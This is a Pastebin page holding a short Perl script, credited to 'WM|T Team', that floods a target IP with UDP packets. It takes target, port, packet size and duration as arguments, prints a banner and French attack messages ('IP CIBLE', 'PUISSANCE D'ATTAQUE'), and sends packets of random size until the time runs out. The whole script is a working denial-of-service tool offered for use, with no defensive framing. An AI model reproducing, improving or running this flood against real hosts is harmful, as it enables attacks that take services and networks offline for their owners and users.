Advertisement
Guest User

Untitled

a guest
Aug 20th, 2018
63
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.15 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  
  3. ##
  4. # WM|T Team
  5. ##
  6.  
  7. use Socket;
  8. use strict;
  9.  
  10. my ($ip,$port,$size,$time) = @ARGV;
  11.  
  12. my ($iaddr,$endtime,$psize,$pport);
  13.  
  14. $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
  15. $endtime = time() + ($time ? $time : 100);
  16. socket(flood, PF_INET, SOCK_DGRAM, 17);
  17. use Term::ANSIColor;
  18. print color 'green';
  19. print <<EOTEXT;
  20.  
  21. ooooooooo
  22. 888 88o ooooooo oooo o oooo oo oooooo
  23. 888 888 888 888 888 888 888 888 888
  24. 888 888 888 888 888888888 888 888
  25. o888ooo88 88ooo88 88 88 o888o o888o
  26.  
  27.  
  28. EOTEXT
  29. use Term::ANSIColor;
  30. print color 'cyan';
  31. print "IP CIBLE: $ip " . "SUR LE PORT: " . ($port ? $port : "random") . "
  32. PUISSANCE D'ATTAQUE: " .
  33. ($size ? "$size BYTE(S)" : "PUISSANCE MAX DU VPS !") . "
  34. " .
  35. ($time ? " POUR $time SECONDE(S)" : "") . "\n";
  36. print "STOPPER L'ATTAQUE: CTRL + C" unless $time;
  37.  
  38. for (;time() <= $endtime;) {
  39. $psize = $size ? $size : int(rand(1500000-64)+64) ;
  40. $pport = $port ? $port : int(rand(1500000))+1;
  41.  
  42. send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport,
  43. $iaddr));}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement